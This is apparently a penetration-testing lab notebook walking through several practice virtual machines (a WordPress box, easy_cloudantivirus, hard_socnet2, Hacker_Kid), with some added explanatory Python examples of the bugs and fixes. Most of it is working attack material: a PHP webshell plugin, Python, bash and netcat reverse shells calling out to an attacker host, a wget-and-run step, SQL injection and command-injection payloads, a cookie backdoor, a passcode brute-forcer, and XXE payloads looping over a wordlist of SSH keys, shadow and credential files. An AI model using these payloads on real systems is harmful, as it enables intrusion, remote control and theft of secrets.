| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.56.200/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.56.200/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.56.200/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.7.1 identified (Insecure, released on 2021-04-15).
| Found By: Emoji Settings (Passive Detection)
| - http://192.168.56.200/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.7.1'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.56.200/wordpress/, Match: 'WordPress 5.7.1'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <==============> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - admin / adam14
Trying admin / adalberto Time: 00:03:44 < > (29510 / 14373902) 0.20% ETA: ??:??:??

[!] Valid Combinations Found:
| Username: admin, Password: adam14

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Fri Jul 14 01:44:44 2023
[+] Requests Done: 29651
[+] Cached Requests: 29
[+] Data Sent: 17.158 MB
[+] Data Received: 17.937 MB
[+] Memory used: 272.906 MB
[+] Elapsed time: 00:03:48

Log in at http://192.168.56.200/wordpress/wp-login.php with admin / adam14, then install the following PHP file as a plugin (it ends up under wp-content/plugins/):
<?php
/**
 * Plugin Name: Webshell
 * Description: WP Webshell for Pentest
 * Version: 1.0
 */
// Whatever arrives in ?cmd= is handed straight to system(). WordPress accepts the
// file as a plugin because of the header block above, and the file can also be
// requested directly by its path under wp-content/plugins/.
if (isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
?>


http://192.168.56.200/wordpress/wp-content/plugins/shell.php?cmd=id

Python reverse shell (run through the webshell; pty.spawn gives a proper tty straight away):

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.102",7779));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty;pty.spawn(["/bin/bash"])'

First flag

Second flag: check the sudo rights, then escape from the mysql client to a root shell (\! runs a shell command from inside mysql):

sudo -l
sudo /usr/bin/mysql -u root -D wordpress -p
adam14
\! /bin/bash

Target: easy_cloudantivirus

https://www.cnblogs.com/shadow-/p/16819678.html

https://www.cnblogs.com/jason-huawen/p/16867502.html // reverse shell

arp-scan -l -I eth0
nmap -A -T4 192.168.56.106
http://192.168.56.106:8080/

target.txt (the login request captured in the browser, saved for sqlmap -r):

POST /login HTTP/1.1
Host: 192.168.56.106:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 12
Origin: http://192.168.56.106:8080
Connection: close
Referer: http://192.168.56.106:8080/
Upgrade-Insecure-Requests: 1

password=123
sqlmap -r target.txt -f --level 4 --risk 3

The login also falls to a manual payload in the password field:

" or 1=1 -- -
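As an added illustration (not from the original write-up), the following Python models what that payload does to a login query built by string concatenation, using an in-memory SQLite table with made-up rows, and shows the parameterised form that is immune. The target's payload uses double quotes, which MySQL treats as string delimiters; SQLite only does so depending on build options, so the model uses the single-quoted equivalent of the same injection.

```python
import sqlite3


def make_db():
    """Constructed sample table; the real box's schema is not on the page."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    db.executemany(
        "INSERT INTO users (name, password) VALUES (?, ?)",
        [("scanner", "example-pass-1"), ("guest", "guest")],
    )
    return db


def login_vulnerable(db, password):
    """String-built query: the submitted password becomes part of the SQL text,
    so ' or 1=1 -- - closes the literal, adds an always-true clause and
    comments out the trailing quote. The first row that matches is 'logged in'."""
    sql = "SELECT name FROM users WHERE password = '%s'" % password
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_fixed(db, password):
    """Parameterised query: the value is bound, never parsed as SQL."""
    row = db.execute(
        "SELECT name FROM users WHERE password = ?", (password,)
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    payload = "' or 1=1 -- -"
    print("vulnerable:", login_vulnerable(db, payload))  # first user in the table
    print("fixed:     ", login_fixed(db, payload))       # None
```

With the vulnerable query the password check degenerates to `WHERE password = '' or 1=1`, which is why sqlmap with --risk 3 (OR-based payloads) finds it immediately.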

Reverse shell

bash;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 7779 >/tmp/f
python3 -c 'import pty;pty.spawn("/bin/bash")' 
ls -alh

The home directory contains a setuid-root binary, update_cloudav, with its source update_cloudav.c next to it:

scanner@cloudav:~$ ls -alh
ls -alh
total 60K
drwxr-xr-x 6 scanner scanner 4.0K Oct 24 2018 .
drwxr-xr-x 4 root root 4.0K Oct 21 2018 ..
-rw------- 1 scanner scanner 5 Oct 24 2018 .bash_history
-rw-r--r-- 1 scanner scanner 220 Oct 21 2018 .bash_logout
-rw-r--r-- 1 scanner scanner 3.7K Oct 21 2018 .bashrc
drwx------ 2 scanner scanner 4.0K Oct 21 2018 .cache
drwxrwxr-x 4 scanner scanner 4.0K Oct 24 2018 cloudav_app
drwx------ 3 scanner scanner 4.0K Oct 21 2018 .gnupg
drwxrwxr-x 3 scanner scanner 4.0K Oct 21 2018 .local
-rw-r--r-- 1 scanner scanner 807 Oct 21 2018 .profile
-rw-rw-r-- 1 scanner scanner 66 Oct 21 2018 .selected_editor
-rwsr-xr-x 1 root scanner 8.4K Oct 24 2018 update_cloudav
-rw-rw-r-- 1 scanner scanner 393 Oct 24 2018 update_cloudav.c
#include <stdio.h>
#include <stdlib.h>   /* malloc; not in the file on the box, added so it compiles cleanly */
#include <string.h>   /* strlen */
#include <unistd.h>   /* setgid, setuid */

int main(int argc, char *argv[])
{
    char *freshclam = "/usr/bin/freshclam";

    if (argc < 2) {
        printf("This tool lets you update antivirus rules\nPlease supply command line arguments for freshclam\n");
        return 1;
    }

    /* argv[1] is pasted into a shell command line unquoted and unchecked. */
    char *command = malloc(strlen(freshclam) + strlen(argv[1]) + 2);
    sprintf(command, "%s %s", freshclam, argv[1]);
    setgid(0);
    setuid(0);
    system(command);   /* runs /bin/sh -c "/usr/bin/freshclam <argv[1]>" as root */
    return 0;
}
Because argv[1] is concatenated into the command string without quoting, a pipe in the argument makes the root shell run our script:

touch b.sh && echo 'bash -i >& /dev/tcp/192.168.56.102/7778 0>&1' > b.sh && ./update_cloudav "a | ls | grep 'xxxxx' | bash b.sh"

The same with fewer moving parts:

touch b.sh && echo 'bash -i >& /dev/tcp/192.168.56.102/7778 0>&1' > b.sh && ./update_cloudav "a | bash b.sh"
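An added Python model of the bug (example code, not from the write-up or the box): a stand-in for freshclam (echo, an assumption made so the demo runs anywhere) is invoked the way update_cloudav does it, through system()/sh -c with the user argument pasted into the string, and then the way it should be, as a separate argv element. The same input behaves completely differently.

```python
import subprocess

# Stand-in for /usr/bin/freshclam (assumption for this example): echo just prints
# the argument list it receives, which makes the difference visible.
FRESHCLAM = "echo"


def run_update_vulnerable(user_arg):
    """Mirror of update_cloudav: sprintf("%s %s", freshclam, argv[1]) + system().
    system() hands the string to /bin/sh -c, so shell metacharacters in
    user_arg are interpreted (here: a pipe into tr)."""
    command = "%s %s" % (FRESHCLAM, user_arg)
    completed = subprocess.run(command, shell=True, capture_output=True, text=True)
    return completed.stdout


def run_update_fixed(user_arg):
    """Same functionality without a shell: the argument is one argv element,
    so '|' and ';' are ordinary characters passed to the program."""
    completed = subprocess.run([FRESHCLAM, user_arg], capture_output=True, text=True)
    return completed.stdout


if __name__ == "__main__":
    payload = "a | tr a-z A-Z"
    print("vulnerable:", repr(run_update_vulnerable(payload)))  # 'A\n'  (tr ran)
    print("fixed:     ", repr(run_update_fixed(payload)))       # 'a | tr a-z A-Z\n'
```

In the C program the equivalent fix is to build an argv array and call execv() on /usr/bin/freshclam in a forked child instead of system(); it is the combination of the setuid bit and a shell-interpreted string that turns a pipe character in argv[1] into a root shell.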


Target: hard_socnet2

https://www.cnblogs.com/shadow-/p/16863184.html

arp-scan -l -I eth0
nmap -A -T4 192.168.56.107

http://192.168.56.107/
http://192.168.56.107:8000/

Generate the backdoor (webacoo emits a PHP backdoor that receives its commands in an HTTP cookie):

webacoo -g -o exp.php
webacoo -t -u http://192.168.56.107/data/images/posts/9.php
webacoo$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
webacoo$ uname -a
Linux socnet2 4.15.0-38-generic #41-Ubuntu SMP Wed Oct 10 10:59:38 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
Reverse shell from the backdoor:

bash -c 'bash -i >& /dev/tcp/192.168.56.102/7778 0>&1'

Or serve a script from Kali and fetch it on the target:

touch 1.sh && echo "bash -c 'bash -i >& /dev/tcp/192.168.56.102/7778 0>&1'" > 1.sh && python3 -m http.server 5000
wget http://192.168.56.102:5000/1.sh && chmod 777 ./1.sh && ./1.sh

Upgrade to a tty:

python -c "import pty; pty.spawn('/bin/bash')"
#my remote server management API
import SimpleXMLRPCServer
import subprocess
import random

debugging_pass = random.randint(1000,9999)

def runcmd(cmd):
    results = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
    output = results.stdout.read() + results.stderr.read()
    return output

def cpu():
    return runcmd("cat /proc/cpuinfo")

def mem():
    return runcmd("free -m")

def disk():
    return runcmd("df -h")

def net():
    return runcmd("ip a")

def secure_cmd(cmd,passcode):
    if passcode==debugging_pass:
        return runcmd(cmd)
    else:
        return "Wrong passcode."

server = SimpleXMLRPCServer.SimpleXMLRPCServer(("0.0.0.0", 8000))
server.register_function(cpu)
server.register_function(mem)
server.register_function(disk)
server.register_function(net)
server.register_function(secure_cmd)

server.serve_forever()
import xmlrpc.client

with xmlrpc.client.ServerProxy("http://192.168.56.107:8000/") as proxy:
    # print(str(proxy.cpu()))

    # Brute-force the 4-digit debugging passcode (1000..9999):
    # for i in range(1000, 10000):
    #     if "Wrong" not in str(proxy.secure_cmd('whoami', i)):
    #         print(i)
    #         break

    res = str(proxy.secure_cmd('whoami', 6753))
    print(res)

    res = str(proxy.secure_cmd('/var/www/html/data/images/posts/1.sh', 6753))
    print(res)
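The commented-out loop above, as a complete runnable example (added here, not part of the original write-up): a local stand-in for the target's API with the same secure_cmd(cmd, passcode) interface and the same "Wrong passcode." reply is started on a random port, and the client brute-forces the 4-digit passcode using that reply as an oracle. The mock only echoes the command back instead of running it; its port and passcode are assumptions for the demo.

```python
import random
import threading
from xmlrpc.client import ServerProxy
from xmlrpc.server import SimpleXMLRPCServer


def start_mock_api(passcode):
    """Local stand-in for the 'remote server management API' on the box
    (assumption: same secure_cmd(cmd, passcode) signature and error string).
    Unlike the real one it never executes cmd."""
    server = SimpleXMLRPCServer(("127.0.0.1", 0), logRequests=False)

    def secure_cmd(cmd, code):
        if code == passcode:
            return "would run as the service user: " + cmd
        return "Wrong passcode."

    server.register_function(secure_cmd)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def brute_force_passcode(url, probe="id"):
    """Try every value randint(1000, 9999) can produce. A wrong code yields
    "Wrong passcode.", so the first reply that differs reveals the code."""
    proxy = ServerProxy(url)
    for code in range(1000, 10000):
        if "Wrong passcode" not in str(proxy.secure_cmd(probe, code)):
            return code
    return None


if __name__ == "__main__":
    server = start_mock_api(random.randint(1000, 9999))
    url = "http://127.0.0.1:%d/" % server.server_address[1]
    print("recovered passcode:", brute_force_passcode(url))
    server.shutdown()
```

A passcode drawn from randint(1000, 9999) gives at most 9000 guesses, and the service neither rate-limits nor logs failed attempts, so recovery takes seconds over a LAN; once the code is known, secure_cmd is an unauthenticated remote shell.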


Second privilege escalation (to root):

That one is a binary exploitation exercise; go learn pwn first ()

Target: Hacker_Kid-v1.0.1

https://www.cnblogs.com/shadow-/p/16906028.html

arp-scan -l -I eth0
nmap -A -T4 192.168.56.108
http://192.168.56.108/
http://192.168.56.108:9999/
comm -3 <(curl "http://192.168.56.108/" 2>/dev/null) <(curl "http://192.168.56.108/?page_no=0" 2>/dev/null) 2>/dev/null
  • The difference can be spotted in the browser, or by fetching both pages with curl and comparing the returned source with comm
    • Process substitution feeds the curl output to comm, much like a pipe | would
    • 2>/dev/null redirects standard error to /dev/null
      • /dev/null is a special file that discards everything written to it; think of it as a bin
comm -3 <(curl "http://192.168.56.108/?page_no=1" 2>/dev/null) <(curl "http://192.168.56.108/?page_no=0" 2>/dev/null) 2>/dev/null

Both give the same result, so script a loop to find which page_no differs:

i=0
while (( $i<=50 ))
do
    j=$((i+1))
    str=`comm -3 \
        <(curl -i "http://192.168.56.108/?page_no=$i" 2>/dev/null) \
        <(curl -i "http://192.168.56.108/?page_no=$j" 2>/dev/null) \
        2>/dev/null`
    if ((${#str} > 0))
    then
        echo $j
        break
    fi
    let "i++"
done
┌──(root㉿kali)-[/home/kali/Desktop]
└─# bash loop.sh
21
comm -3 <(curl "http://192.168.56.108/?page_no=0" 2>/dev/null) <(curl "http://192.168.56.108/?page_no=21" 2>/dev/null) 2>/dev/null
┌──(root㉿kali)-[/home/kali/Desktop]
└─# comm -3 <(curl "http://192.168.56.108/?page_no=0" 2>/dev/null) <(curl "http://192.168.56.108/?page_no=21" 2>/dev/null) 2>/dev/null
Oh Man !! Isn't is right to go a little deep inside?
<font color="red">
</center>


<!--

<div class="container py-5">
<h1>Thanks</h1>

Okay so you want me to speak something ?<br>I am a hacker kid not a dumb hacker. So i created some subdomains to return back on the server whenever i want!!<br>Out of my many homes...one such home..one such home for me : hackers.blackhat.local<br>
<font color="red">
</center>


<!--

<div class="container py-5">
<h1>Thanks</h1>

Following the hint, send the request with the subdomain as Host header:

curl -H 'Host: hackerkid.blackhat.local' "http://192.168.56.108"
echo '
<?xml version="1.0" encoding="UTF-8"?>
<root>
<name>1</name>
<tel>1</tel>
<email>xxx@xxx.com</email>
<password>1</password>
</root>' \
| curl http://192.168.56.108/process.php \
-H 'Host: hackerkid.blackhat.local' \
-d @-
  • The response is "Sorry, xxx@xxx.com is not available !!!", and after a few tries it is clear that the xxx@xxx.com part is reflected from the request
  • So we can try XML-related vulnerabilities (XXE)
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE drug [<!ENTITY k SYSTEM 'file:///etc/passwd'>]>
<root>
<name>1</name>
<tel>1</tel>
<email>&k;</email>
<password>1</password>
</root>
  • If <!DOCTYPE drug [<!ENTITY k SYSTEM 'file:///etc/passwd'>]> is unfamiliar, read up on DTDs
  • A DTD is embedded in XML with a DOCTYPE declaration; drug is the document type name, and a non-validating parser does not check it against the root element, so any name works
  • ENTITY declares an external entity: k is just a name, SYSTEM pulls in an external resource, so k now stands for the contents of file:///etc/passwd
  • The email element contains &k;, so the response echoes the file's contents back to us
echo '
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE drug [<!ENTITY k SYSTEM "file:///etc/passwd">]>
<root>
<name>1</name>
<tel>1</tel>
<email>&k;</email>
<password>1</password>
</root>' \
| curl http://192.168.56.108/process.php \
-H 'Host: hackerkid.blackhat.local' \
-d @-

This reads /etc/passwd successfully.
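To make clear what the target's process.php is doing with that DOCTYPE, here is an added Python example (not from the original post) built on the standard-library expat parser: xxe_payload() produces the page's payload for any path, and parse_profile() either resolves the SYSTEM entity from disk, as the vulnerable endpoint evidently does (the assumption being that it behaves like libxml with external entity loading enabled), or refuses it, which is the fix. The php://filter base64 wrapper used later is PHP-specific and is not modelled.

```python
import xml.parsers.expat


def xxe_payload(path):
    """The page's payload, parametrised on the file to read."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        '<!DOCTYPE drug [<!ENTITY k SYSTEM "file://%s">]>\n'
        '<root><name>1</name><tel>1</tel><email>&k;</email>'
        '<password>1</password></root>' % path
    )


def parse_profile(xml_text, resolve_external_entities):
    """Collect the text of each element of the submitted profile.

    resolve_external_entities=True models the vulnerable endpoint: the
    parser opens whatever the SYSTEM identifier points at and splices the
    file's contents into the referencing element (here <email>), which the
    application then reflects in its error message.
    False is the hardened behaviour: the reference is rejected before
    anything is read."""
    fields = {}
    stack = []
    parser = xml.parsers.expat.ParserCreate()

    def start(name, attrs):
        stack.append(name)
        fields.setdefault(name, "")

    def end(name):
        stack.pop()

    def chars(data):
        if stack:
            fields[stack[-1]] += data

    def external_entity(context, base, system_id, public_id):
        if not resolve_external_entities:
            raise ValueError("external entity refused: %s" % system_id)
        path = system_id[len("file://"):] if system_id.startswith("file://") else system_id
        with open(path, encoding="utf-8") as fh:
            # A child parser inherits the handlers above, so the file's
            # contents land in the element that referenced the entity.
            parser.ExternalEntityParserCreate(context).Parse(fh.read(), True)
        return 1

    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = chars
    parser.ExternalEntityRefHandler = external_entity
    parser.Parse(xml_text, True)
    return fields


if __name__ == "__main__":
    import os
    import tempfile

    # Constructed stand-in for /etc/passwd so the demo does not depend on the host.
    fd, sample = tempfile.mkstemp()
    with os.fdopen(fd, "w") as fh:
        fh.write("root:x:0:0:root:/root:/bin/bash\nsaket:x:1000:1000:Ubuntu,,,:/home/saket:/bin/bash\n")
    print("vulnerable parser returns:", parse_profile(xxe_payload(sample), True)["email"])
    try:
        parse_profile(xxe_payload(sample), False)
    except ValueError as err:
        print("hardened parser:", err)
    os.unlink(sample)
```

For PHP the equivalent hardening is to keep external entity loading disabled (the libxml default since PHP 8) and never to echo parsed field values back in error messages.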

Next, brute-force file paths,

using a wordlist of sensitive Linux files (file.txt; the copy with /home/* replaced by /home/saket after reading /etc/passwd is the file0.txt the loop reads):

/apache/apache/conf/httpd.conf
/apache/apache2/conf/httpd.conf
/apache/php/php.ini
/etc/anacrontab
/etc/apache/apache.conf
/etc/apache/httpd.conf
/etc/apache2/apache.conf
/etc/apache2/httpd.conf
/etc/apache2/sites-available/default
/etc/apache2/vhosts.d/00_default_vhost.conf
/etc/at.allow
/etc/at.deny
/etc/cron.allow
/etc/cron.deny
/etc/crontab
/etc/fstab
/etc/host.conf
/etc/httpd/conf.d/httpd.conf
/etc/httpd/conf.d/php.conf
/etc/httpd/conf/httpd.conf
/etc/httpd/htdocs/index.html
/etc/httpd/htdocs/index.php
/etc/httpd/logs/access.log
/etc/httpd/logs/access_log
/etc/httpd/logs/error.log
/etc/httpd/logs/error_log
/etc/httpd/php.ini
/etc/init.d/httpd
/etc/init.d/mysql
/etc/ld.so.conf
/etc/motd
/etc/my.cnf
/etc/mysql/my.cnf
/etc/mysql/my.cnf
/etc/network/interfaces
/etc/networks
/etc/passwd
/etc/php.ini
/etc/php/apache/php.ini
/etc/php/apache2/php.ini
/etc/php/cgi/php.ini
/etc/php/php.ini
/etc/php/php4/php.ini
/etc/php4.4/fcgi/php.ini
/etc/php4/apache/php.ini
/etc/php4/apache2/php.ini
/etc/php4/cgi/php.ini
/etc/php5/apache/php.ini
/etc/php5/apache2/php.ini
/etc/php5/cgi/php.ini
/etc/phpmyadmin/config.inc.php
/etc/resolv.conf
/etc/shadow
/etc/ssh/sshd_config
/etc/ssh/ssh_config
/etc/ssh/ssh_host_dsa_key
/etc/ssh/ssh_host_dsa_key
/etc/ssh/ssh_host_dsa_key.pub
/etc/ssh/ssh_host_dsa_key.pub
/etc/ssh/ssh_host_key
/etc/ssh/ssh_host_key
/etc/ssh/ssh_host_key.pub
/etc/ssh/ssh_host_key.pub
/etc/ssh/ssh_host_rsa_key
/etc/ssh/ssh_host_rsa_key
/etc/ssh/ssh_host_rsa_key.pub
/etc/ssh/ssh_host_rsa_key.pub
/etc/sysconfig/network
/etc/sysconfig/network
/home/apache/conf/httpd.conf
/home/apache2/conf/httpd.conf
/home/bin/stable/apache/php.ini
/home2/bin/stable/apache/php.ini
/NetServer/bin/stable/apache/php.ini
/opt/www/conf/httpd.conf
/opt/www/htdocs/index.html
/opt/www/htdocs/index.php
/opt/xampp/etc/php.ini
/PHP/php.ini
/php/php.ini
/php4/php.ini
/php5/php.ini
/tmp/apache/htdocs/index.html
/tmp/apache/htdocs/index.php
/usr/lib/php.ini
/usr/lib/php/php.ini
/usr/share/tomcat6/bin/startup.sh
/usr/tomcat6/bin/startup.sh
/var/apache2/config.inc
/var/httpd/conf/httpd.conf
/var/httpd/conf/php.ini
/var/httpd/conf/php.ini
/var/httpd/htdocs/index.html
/var/httpd/htdocs/index.php
/var/lib/mysql/my.cnf
/var/lib/mysql/mysql/user.MYD
/var/local/www/conf/httpd.conf
/var/local/www/conf/php.ini
/var/log/access.log
/var/log/access_log
/var/log/apache/access.log
/var/log/apache/access_log
/var/log/apache/error.log
/var/log/apache/error_log
/var/log/apache2/access.log
/var/log/apache2/access_log
/var/log/apache2/error.log
/var/log/apache2/error_log
/var/log/error.log
/var/log/error_log
/var/log/mysql.log
/var/log/mysql/mysql-bin.log
/var/log/mysql/mysql-slow.log
/var/log/mysql/mysql.log
/var/log/mysqlderror.log
/var/mail/root
/var/mysql.log
/var/spool/cron/crontabs/root
/var/spool/mail/root
/var/www/conf/httpd.conf
/var/www/htdocs/index.html
/var/www/htdocs/index.php
/var/www/index.html
/var/www/index.php
/var/www/logs/access.log
/var/www/logs/access_log
/var/www/logs/error.log
/var/www/logs/error_log
/web/conf/php.ini
/www/conf/httpd.conf
/www/htdocs/index.html
/www/htdocs/index.php
/www/php/php.ini
/www/php4/php.ini
/www/php5/php.ini
/xampp/apache/bin/php.ini
/xampp/apache/conf/httpd.conf
/root/.ssh/authorized_keys
/root/.ssh/identity
/root/.ssh/identity.pub
/root/.ssh/id_dsa
/root/.ssh/id_dsa.pub
/root/.ssh/id_rsa
/root/.ssh/id_rsa.pub
/root/.atftp_history
/root/.bashrc
/root/.bash_history
/root/.mysql_history
/root/.nano_history
/root/.php_history
/root/.profile
/root/.ssh/authorized_keys
/root/.ssh/identity
/root/.ssh/identity.pub
/root/.ssh/id_dsa
/root/.ssh/id_dsa.pub
/root/.ssh/id_rsa
/root/.ssh/id_rsa.pub
/root/anaconda-ks.cfg
/home/*/.ssh/authorized_keys
/home/*/.ssh/identity
/home/*/.ssh/identity.pub
/home/*/.ssh/id_dsa
/home/*/.ssh/id_dsa.pub
/home/*/.ssh/id_rsa
/home/*/.ssh/id_rsa.pub
/home/*/.atftp_history
/home/*/.bashrc
/home/*/.bash_history
/home/*/.mysql_history
/home/*/.nano_history
/home/*/.php_history
/home/*/.profile
/home/*/.ssh/authorized_keys
/home/*/.ssh/identity
/home/*/.ssh/identity.pub
/home/*/.ssh/id_dsa
/home/*/.ssh/id_dsa.pub
/home/*/.ssh/id_rsa
/home/*/.ssh/id_rsa.pub
/home/*/anaconda-ks.cfg
: > ./test
for i in $(cat ./file0.txt)
do
    str=`echo '<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE drug [<!ENTITY k SYSTEM "php://filter/convert.base64-encode/resource='$i'">]>
<root>
<name>1</name>
<tel>1</tel>
<email>&k;</email>
<password>1</password>
</root>' \
    | curl http://192.168.56.108/process.php \
        -H 'Host: hackerkid.blackhat.local' \
        -d @- 2>/dev/null`

    # The response is "Sorry, <base64> is not available !!!": drop the 7-character
    # prefix and the 21-character suffix to keep only the base64 payload.
    body=${str:7:${#str}-28}
    if ((${#body} != 0)); then
        printf '\n#%s###:\n' "$i" >> ./test
        echo "$body" | base64 -d -i 2>/dev/null | grep -E "(username|root|saket|admin|password|passwd)" >> ./test
    fi
done
grep -E "(username|root|saket|admin|password|passwd)" ./test
/apache/apache/conf/httpd.conf
/apache/apache2/conf/httpd.conf
/apache/php/php.ini
/etc/anacrontab
/etc/apache/apache.conf
/etc/apache/httpd.conf
/etc/apache2/apache.conf
/etc/apache2/httpd.conf
/etc/apache2/sites-available/default
/etc/apache2/vhosts.d/00_default_vhost.conf
/etc/at.allow
/etc/at.deny
/etc/cron.allow
/etc/cron.deny
/etc/crontab
/etc/fstab
/etc/host.conf
/etc/httpd/conf.d/httpd.conf
/etc/httpd/conf.d/php.conf
/etc/httpd/conf/httpd.conf
/etc/httpd/htdocs/index.html
/etc/httpd/htdocs/index.php
/etc/httpd/logs/access.log
/etc/httpd/logs/access_log
/etc/httpd/logs/error.log
/etc/httpd/logs/error_log
/etc/httpd/php.ini
/etc/init.d/httpd
/etc/init.d/mysql
/etc/ld.so.conf
/etc/motd
/etc/my.cnf
/etc/mysql/my.cnf
/etc/mysql/my.cnf
/etc/network/interfaces
/etc/networks
/etc/passwd
/etc/php.ini
/etc/php/apache/php.ini
/etc/php/apache2/php.ini
/etc/php/cgi/php.ini
/etc/php/php.ini
/etc/php/php4/php.ini
/etc/php4.4/fcgi/php.ini
/etc/php4/apache/php.ini
/etc/php4/apache2/php.ini
/etc/php4/cgi/php.ini
/etc/php5/apache/php.ini
/etc/php5/apache2/php.ini
/etc/php5/cgi/php.ini
/etc/phpmyadmin/config.inc.php
/etc/resolv.conf
/etc/shadow
/etc/ssh/sshd_config
/etc/ssh/ssh_config
/etc/ssh/ssh_host_dsa_key
/etc/ssh/ssh_host_dsa_key
/etc/ssh/ssh_host_dsa_key.pub
/etc/ssh/ssh_host_dsa_key.pub
/etc/ssh/ssh_host_key
/etc/ssh/ssh_host_key
/etc/ssh/ssh_host_key.pub
/etc/ssh/ssh_host_key.pub
/etc/ssh/ssh_host_rsa_key
/etc/ssh/ssh_host_rsa_key
/etc/ssh/ssh_host_rsa_key.pub
/etc/ssh/ssh_host_rsa_key.pub
/etc/sysconfig/network
/etc/sysconfig/network
/home/apache/conf/httpd.conf
/home/apache2/conf/httpd.conf
/home/bin/stable/apache/php.ini
/home2/bin/stable/apache/php.ini
/NetServer/bin/stable/apache/php.ini
/opt/www/conf/httpd.conf
/opt/www/htdocs/index.html
/opt/www/htdocs/index.php
/opt/xampp/etc/php.ini
/PHP/php.ini
/php/php.ini
/php4/php.ini
/php5/php.ini
/tmp/apache/htdocs/index.html
/tmp/apache/htdocs/index.php
/usr/lib/php.ini
/usr/lib/php/php.ini
/usr/share/tomcat6/bin/startup.sh
/usr/tomcat6/bin/startup.sh
/var/apache2/config.inc
/var/httpd/conf/httpd.conf
/var/httpd/conf/php.ini
/var/httpd/conf/php.ini
/var/httpd/htdocs/index.html
/var/httpd/htdocs/index.php
/var/lib/mysql/my.cnf
/var/lib/mysql/mysql/user.MYD
/var/local/www/conf/httpd.conf
/var/local/www/conf/php.ini
/var/log/access.log
/var/log/access_log
/var/log/apache/access.log
/var/log/apache/access_log
/var/log/apache/error.log
/var/log/apache/error_log
/var/log/apache2/access.log
/var/log/apache2/access_log
/var/log/apache2/error.log
/var/log/apache2/error_log
/var/log/error.log
/var/log/error_log
/var/log/mysql.log
/var/log/mysql/mysql-bin.log
/var/log/mysql/mysql-slow.log
/var/log/mysql/mysql.log
/var/log/mysqlderror.log
/var/mail/root
/var/mysql.log
/var/spool/cron/crontabs/root
/var/spool/mail/root
/var/www/conf/httpd.conf
/var/www/htdocs/index.html
/var/www/htdocs/index.php
/var/www/index.html
/var/www/index.php
/var/www/logs/access.log
/var/www/logs/access_log
/var/www/logs/error.log
/var/www/logs/error_log
/web/conf/php.ini
/www/conf/httpd.conf
/www/htdocs/index.html
/www/htdocs/index.php
/www/php/php.ini
/www/php4/php.ini
/www/php5/php.ini
/xampp/apache/bin/php.ini
/xampp/apache/conf/httpd.conf
/root/.ssh/authorized_keys
/root/.ssh/identity
/root/.ssh/identity.pub
/root/.ssh/id_dsa
/root/.ssh/id_dsa.pub
/root/.ssh/id_rsa
/root/.ssh/id_rsa.pub
/root/.atftp_history
/root/.bashrc
/root/.bash_history
/root/.mysql_history
/root/.nano_history
/root/.php_history
/root/.profile
/root/.ssh/authorized_keys
/root/.ssh/identity
/root/.ssh/identity.pub
/root/.ssh/id_dsa
/root/.ssh/id_dsa.pub
/root/.ssh/id_rsa
/root/.ssh/id_rsa.pub
/root/anaconda-ks.cfg
/home/saket/.ssh/authorized_keys
/home/saket/.ssh/identity
/home/saket/.ssh/identity.pub
/home/saket/.ssh/id_dsa
/home/saket/.ssh/id_dsa.pub
/home/saket/.ssh/id_rsa
/home/saket/.ssh/id_rsa.pub
/home/saket/.atftp_history
/home/saket/.bashrc
/home/saket/.bash_history
/home/saket/.mysql_history
/home/saket/.nano_history
/home/saket/.php_history
/home/saket/.profile
/home/saket/.ssh/authorized_keys
/home/saket/.ssh/identity
/home/saket/.ssh/identity.pub
/home/saket/.ssh/id_dsa
/home/saket/.ssh/id_dsa.pub
/home/saket/.ssh/id_rsa
/home/saket/.ssh/id_rsa.pub
/home/saket/anaconda-ks.cfg
HOME=/root
LOGNAME=root
# and files in /etc/cron.d. These files also have username fields,
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
